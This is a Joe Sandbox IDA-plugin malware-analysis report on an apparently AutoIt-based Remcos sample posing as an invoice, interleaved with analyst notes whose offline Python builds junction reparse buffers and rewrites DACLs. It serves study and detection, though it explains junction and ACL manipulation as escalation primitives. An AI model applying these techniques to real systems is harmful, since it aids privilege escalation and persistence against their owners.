                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: 34c75bdbfff7d51095543224af54617ba0098665a19618c7eb31fc134284a7e6
                                                                            • Instruction ID: 6be5a53c67990fdf0b6550567a9fedb1ed27cdf64edf49342fbfc159752d95b7
                                                                            • Opcode Fuzzy Hash: 34c75bdbfff7d51095543224af54617ba0098665a19618c7eb31fc134284a7e6
                                                                            • Instruction Fuzzy Hash: 9331B2B1900209ABDB21DFA1DC49FEB37BCEF89751F1041B6F608D6160EB7196449B25
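Analyst note on the routine above (added commentary and example code, not part of the Joe Sandbox output): the call sequence is a directory-junction creation. GetFullPathNameW resolves the target, __swprintf with the "\??\%s" format string visible in the String ID turns it into an NT-namespace path, CreateDirectoryW creates the empty link directory, CreateFileW opens it with GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (0x02200000), and DeviceIoControl with control code 0x900A4, which is FSCTL_SET_REPARSE_POINT, writes the mount-point reparse data. The RemoveDirectoryW after the first CloseHandle is most likely the cleanup path taken when setting the reparse point fails. This is library code of the AutoIt runtime the sample is built on (FileCreateNTFSLink applied to a directory), so by itself it is not Remcos-specific, but junctions are a recurring primitive in file-system redirection and privilege-escalation chains, and both the control code and the buffer format are worth being able to decode from a dump. The Python below, written for this note and not taken from the report or the sample, decodes the CTL_CODE fields of the control code and builds and parses the mount-point REPARSE_DATA_BUFFER that FSCTL_SET_REPARSE_POINT consumes. The target path is constructed; the structure layouts are the documented ones from winioctl.h and ntifs.h, and nothing here touches a live file system.

```python
"""Decode the FSCTL used by the routine above and build/parse the mount-point
REPARSE_DATA_BUFFER that FSCTL_SET_REPARSE_POINT expects.

Added example, not code from the Joe Sandbox report or the analysed sample.
Runs offline on constructed data; layouts follow winioctl.h / ntifs.h."""
import struct

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
FILE_DEVICE_FILE_SYSTEM = 0x00000009
FSCTL_NAMES = {  # the three reparse-point FSCTLs, function codes 41..43
    41: "FSCTL_SET_REPARSE_POINT",
    42: "FSCTL_GET_REPARSE_POINT",
    43: "FSCTL_DELETE_REPARSE_POINT",
}
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003  # directory junction
IO_REPARSE_TAG_SYMLINK = 0xA000000C


def decode_ctl_code(code: int) -> dict:
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    name = FSCTL_NAMES.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {"device": device, "access": access, "function": function,
            "method": method, "name": name}


def build_mount_point_buffer(target: str) -> bytes:
    """Build the REPARSE_DATA_BUFFER for a junction pointing at `target`
    (a constructed Win32 path such as 'C:\\Windows\\Temp').  The substitute
    name carries the NT prefix '\\??\\', matching the routine's '\\??\\%s'."""
    substitute = ("\\??\\" + target).encode("utf-16-le")
    print_name = target.encode("utf-16-le")
    # MountPointReparseBuffer: SubstituteNameOffset, SubstituteNameLength,
    # PrintNameOffset, PrintNameLength (USHORT each), then PathBuffer holding
    # SubstituteName\0 PrintName\0; the lengths exclude the terminators.
    path_buffer = substitute + b"\x00\x00" + print_name + b"\x00\x00"
    offsets = struct.pack("<HHHH", 0, len(substitute),
                          len(substitute) + 2, len(print_name))
    data = offsets + path_buffer
    # Common header: ReparseTag (ULONG), ReparseDataLength (USHORT), Reserved.
    return struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, len(data), 0) + data


def parse_reparse_buffer(buf: bytes) -> dict:
    """Parse a mount-point or symlink REPARSE_DATA_BUFFER, e.g. one returned
    by FSCTL_GET_REPARSE_POINT or carved from a memory dump."""
    tag, data_len, _reserved = struct.unpack_from("<IHH", buf, 0)
    if tag not in (IO_REPARSE_TAG_MOUNT_POINT, IO_REPARSE_TAG_SYMLINK):
        raise ValueError(f"unsupported reparse tag {tag:#010x}")
    sub_off, sub_len, prn_off, prn_len = struct.unpack_from("<HHHH", buf, 8)
    pos = 16
    flags = 0
    if tag == IO_REPARSE_TAG_SYMLINK:  # symlinks carry an extra ULONG Flags
        (flags,) = struct.unpack_from("<I", buf, pos)
        pos += 4
    path_buffer = buf[pos:8 + data_len]
    return {
        "tag": tag,
        "flags": flags,
        "is_junction": tag == IO_REPARSE_TAG_MOUNT_POINT,
        "substitute_name": path_buffer[sub_off:sub_off + sub_len].decode("utf-16-le"),
        "print_name": path_buffer[prn_off:prn_off + prn_len].decode("utf-16-le"),
    }


if __name__ == "__main__":
    print(decode_ctl_code(0x900A4))
    junction = build_mount_point_buffer("C:\\Windows\\Temp")
    print(junction.hex())
    print(parse_reparse_buffer(junction))
```

The parser also accepts symlink buffers (tag 0xA000000C) because they differ from junctions only by the extra Flags field; when hunting for redirection primitives in a dump, both tags matter.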
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F5C1FC
                                                                            • GetFocus.USER32 ref: 00F5C20C
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00F5C217
                                                                            • _memset.LIBCMT ref: 00F5C342
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F5C36D
                                                                            • GetMenuItemCount.USER32(?), ref: 00F5C38D
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F5C3A0
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F5C3D4
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F5C41C
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F5C454
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F5C489
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3616455698-4108050209
                                                                            • Opcode ID: 4d3847f25e86edef7db7c96533829d9270032be1d99c29e1aae6feacfceed417
                                                                            • Instruction ID: 33788c27bf700064a3005e1a5603ac4c1903b380a3e13525d7355d51270d5c45
                                                                            • Opcode Fuzzy Hash: 4d3847f25e86edef7db7c96533829d9270032be1d99c29e1aae6feacfceed417
                                                                            • Instruction Fuzzy Hash: 07818C716083059FDB11CF14C894E6BBBE8FB88725F00492EFE9697291D770D909EB92
                                                                            APIs
                                                                              • Part of subcall function 00F28202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F2821E
                                                                              • Part of subcall function 00F28202: GetLastError.KERNEL32(?,00F27CE2,?,?,?), ref: 00F28228
                                                                              • Part of subcall function 00F28202: GetProcessHeap.KERNEL32(00000008,?,?,00F27CE2,?,?,?), ref: 00F28237
                                                                              • Part of subcall function 00F28202: RtlAllocateHeap.NTDLL(00000000,?,00F27CE2), ref: 00F2823E
                                                                              • Part of subcall function 00F28202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F28255
                                                                              • Part of subcall function 00F2829F: GetProcessHeap.KERNEL32(00000008,00F27CF8,00000000,00000000,?,00F27CF8,?), ref: 00F282AB
                                                                              • Part of subcall function 00F2829F: RtlAllocateHeap.NTDLL(00000000,?,00F27CF8), ref: 00F282B2
                                                                              • Part of subcall function 00F2829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F27CF8,?), ref: 00F282C3
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F27D13
                                                                            • _memset.LIBCMT ref: 00F27D28
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F27D47
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F27D58
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00F27D95
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F27DB1
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F27DCE
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F27DDD
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F27DE4
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F27E05
                                                                            • CopySid.ADVAPI32(00000000), ref: 00F27E0C
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F27E3D
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F27E63
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F27E77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 2347767575-0
                                                                            • Opcode ID: 3a8b5d97af3ebc37fe73be33d2e10a5f111d8e2d94541c4cfd35988f23599215
                                                                            • Instruction ID: 524736c7442bb585b3e37d53e32fcbcd212ecfffe5a4573aba687e1e332d8ab7
                                                                            • Opcode Fuzzy Hash: 3a8b5d97af3ebc37fe73be33d2e10a5f111d8e2d94541c4cfd35988f23599215
                                                                            • Instruction Fuzzy Hash: 8F616C71900619AFDF00DFA0EC44AEEBB79FF04311F0481A9E915A72A1DB359A05EB60
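Analyst note on the routine above (added commentary and example code, not part of the Joe Sandbox output): GetUserObjectSecurity and SetUserObjectSecurity operate only on user objects, that is window stations and desktops, and the 0x4 argument is DACL_SECURITY_INFORMATION. The body fetches the existing DACL (GetSecurityDescriptorDacl), sizes it with GetAclInformation(…, 0xC, 2), where 2 is AclSizeInformation and 0xC is sizeof(ACL_SIZE_INFORMATION), allocates a larger ACL from the process heap, copies every existing ACE across with GetAce/AddAce, appends a new ACCESS_ALLOWED_ACE built around a copied SID (GetLengthSid/CopySid), and writes the result back with SetSecurityDescriptorDacl(…, TRUE, dacl, FALSE) followed by SetUserObjectSecurity. That is the standard sequence for granting an account access to the interactive window station and desktop, which RunAs-style code needs so that a process started under other credentials can create windows, and it is consistent with the RunAs implementation in the AutoIt runtime this sample is built on. From a detection standpoint, an unexpected process rewriting the DACL of WinSta0 or its Default desktop is worth an alert in its own right. The Python below, written for this note and not taken from the report or the sample, reproduces the ACL handling offline on constructed data: it builds a self-relative DACL, returns the same fields GetAclInformation(AclSizeInformation) reports, and appends an ACE the way the GetAce/AddAce loop does. Layouts follow winnt.h; the SIDs and access masks are constructed.

```python
"""Build a self-relative DACL and append an ACCESS_ALLOWED_ACE to it the way
the GetAclInformation / GetAce / AddAce sequence above does.

Added example, not code from the Joe Sandbox report or the analysed sample.
Pure struct handling on constructed data; no Windows API is called."""
import struct

ACL_REVISION = 2
ACCESS_ALLOWED_ACE_TYPE = 0x00
GENERIC_ALL = 0x10000000
ACL_HEADER = "<BBHHH"        # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_PREFIX = "<BBHI"         # AceType, AceFlags, AceSize, Mask (SID follows)


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-18' -> binary SID: Revision, SubAuthorityCount, 48-bit
    big-endian IdentifierAuthority, little-endian SubAuthority array."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID string: {sid!r}")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes, off: int = 0) -> tuple:
    """Inverse of sid_to_bytes; returns (sid_string, byte_length)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    text = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def build_ace(sid: str, mask: int, flags: int = 0) -> bytes:
    """ACCESS_ALLOWED_ACE = ACE_HEADER(4) + Mask(4) + inline SID."""
    sid_b = sid_to_bytes(sid)
    return struct.pack(ACE_PREFIX, ACCESS_ALLOWED_ACE_TYPE, flags,
                       8 + len(sid_b), mask) + sid_b


def build_acl(aces: list) -> bytes:
    body = b"".join(aces)
    return struct.pack(ACL_HEADER, ACL_REVISION, 0, 8 + len(body), len(aces), 0) + body


def acl_size_information(acl: bytes) -> dict:
    """Same fields GetAclInformation(..., AclSizeInformation) returns."""
    _rev, _sbz1, size, count, _sbz2 = struct.unpack_from(ACL_HEADER, acl, 0)
    in_use = 8
    for _ in range(count):
        in_use += struct.unpack_from("<H", acl, in_use + 2)[0]  # AceSize
    return {"AceCount": count, "AclBytesInUse": in_use, "AclBytesFree": size - in_use}


def get_aces(acl: bytes) -> list:
    """Equivalent of looping GetAce(acl, i, &ace) over every ACE."""
    aces, off = [], 8
    for _ in range(acl_size_information(acl)["AceCount"]):
        size = struct.unpack_from("<H", acl, off + 2)[0]
        aces.append(acl[off:off + size])
        off += size
    return aces


def add_ace_to_dacl(acl: bytes, sid: str, mask: int, flags: int = 0) -> bytes:
    """Copy the existing ACEs into a fresh, larger ACL and append the new one,
    as AddAce with dwStartingAceIndex = MAXDWORD does in the routine."""
    return build_acl(get_aces(acl) + [build_ace(sid, mask, flags)])


def describe(acl: bytes) -> list:
    """[(ace_type, flags, mask, sid_string), ...] for review or alerting."""
    out = []
    for ace in get_aces(acl):
        ace_type, flags, _size, mask = struct.unpack_from(ACE_PREFIX, ace, 0)
        out.append((ace_type, flags, mask, bytes_to_sid(ace, 8)[0]))
    return out


if __name__ == "__main__":
    # Constructed starting DACL: only SYSTEM has full control.
    dacl = build_acl([build_ace("S-1-5-18", GENERIC_ALL)])
    print(acl_size_information(dacl))
    # Constructed domain user SID being granted access to the user object.
    dacl = add_ace_to_dacl(dacl, "S-1-5-21-1111111111-2222222222-3333333333-1001", GENERIC_ALL)
    for entry in describe(dacl):
        print(entry)
```

In a real audit the interesting input is the DACL read back from WinSta0 and the Default desktop after the sample has run; diffing describe() output against a baseline shows which SID was added and with what mask.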
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                                            • API String ID: 0-4228276721
                                                                            • Opcode ID: 0c8ade00b1f7dea8dbb79976ffb709fbacdeb7db542345f5bf60f1bb7bcab87e
                                                                            • Instruction ID: 7a7647d1f90ea7f8023c1e45dbfd0ef32ee4e86e1f57e2f17fee425c73206876
                                                                            • Opcode Fuzzy Hash: 0c8ade00b1f7dea8dbb79976ffb709fbacdeb7db542345f5bf60f1bb7bcab87e
                                                                            • Instruction Fuzzy Hash: C2727F71E00269DBDB24CF59D8807AEB7B5FF58310F24816AE809FB291D7709E81DB94
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00F30097
                                                                            • SetKeyboardState.USER32(?), ref: 00F30102
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00F30122
                                                                            • GetKeyState.USER32(000000A0), ref: 00F30139
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00F30168
                                                                            • GetKeyState.USER32(000000A1), ref: 00F30179
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00F301A5
                                                                            • GetKeyState.USER32(00000011), ref: 00F301B3
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00F301DC
                                                                            • GetKeyState.USER32(00000012), ref: 00F301EA
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00F30213
                                                                            • GetKeyState.USER32(0000005B), ref: 00F30221
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: eb48c75a31932a4e4b0adba787c9abc7cc1dcb7412fe583e5bf54b37d498b650
                                                                            • Instruction ID: 43e1bfdf3ba1e18d16bff74c0a5a448530c1c94c2dddb654b42023fcc090111f
                                                                            • Opcode Fuzzy Hash: eb48c75a31932a4e4b0adba787c9abc7cc1dcb7412fe583e5bf54b37d498b650
                                                                            • Instruction Fuzzy Hash: 8051DC60D0478819FB35EBA488647EABFB49F013B0F08459FD9C1575C2DE649B8CE761
                                                                            APIs
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F504AC
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F5054B
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F505E3
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F50822
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F5082F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: 7cbcb428a04989edce70228d3f90b75dd4bc2ae73d403a64ed82a88a3d692eac
                                                                            • Instruction ID: 35cce75331dde083322195e72560771ef7fab7f03e2ebb9e50db51797800237d
                                                                            • Opcode Fuzzy Hash: 7cbcb428a04989edce70228d3f90b75dd4bc2ae73d403a64ed82a88a3d692eac
                                                                            • Instruction Fuzzy Hash: AAE15F71604214AFCB14DF28C891E2ABBE4FF89715F04856DF94ADB2A2DB30ED05DB91
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CoInitialize.OLE32 ref: 00F48403
                                                                            • CoUninitialize.COMBASE ref: 00F4840E
                                                                            • CoCreateInstance.COMBASE(?,00000000,00000017,00F62BEC,?), ref: 00F4846E
                                                                            • IIDFromString.COMBASE(?,?), ref: 00F484E1
                                                                            • VariantInit.OLEAUT32(?), ref: 00F4857B
                                                                            • VariantClear.OLEAUT32(?), ref: 00F485DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 4958c5589d80333803656b2017b351d4576e76e9aa0374f0dfed8de1428e4722
                                                                            • Instruction ID: b09cd797fc6ca085c3ce190a5ff2d89ad5d8cc1c0f7c64ad9835f9233e3c5b55
                                                                            • Opcode Fuzzy Hash: 4958c5589d80333803656b2017b351d4576e76e9aa0374f0dfed8de1428e4722
                                                                            • Instruction Fuzzy Hash: 496190716083129FC710DF14C848F6EBBE8AF457A4F044459FD859B2A1CB70ED4AEB92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: 060d4ebbe5f1d3e79943fe499631f89dc9fa8e9027f08cc87966024e415ea330
                                                                            • Instruction ID: 485044dd575535ba322cc40ef261068cb3ad01cd0a389fe5a21f5acc4c0d56b2
                                                                            • Opcode Fuzzy Hash: 060d4ebbe5f1d3e79943fe499631f89dc9fa8e9027f08cc87966024e415ea330
                                                                            • Instruction Fuzzy Hash: 1A21B5756002149FDB11AF64EC09B6E7BA8FF44721F10806AFE46EB2A1DB70BD41EB54
                                                                            APIs
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                              • Part of subcall function 00F34A31: GetFileAttributesW.KERNEL32(?,00F3370B), ref: 00F34A32
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F338A3
                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F3394B
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F3395E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F3397B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3399D
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F339B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4002782344-1173974218
                                                                            • Opcode ID: 3ce6485f31d8b6e3f97ce220c3981963fc6f642b588d88a8a65a40fb3483f34d
                                                                            • Instruction ID: 8e41d5c27722d707659b0ebfe69d39a672cbc2028556d9f7c27ca30c01c603de
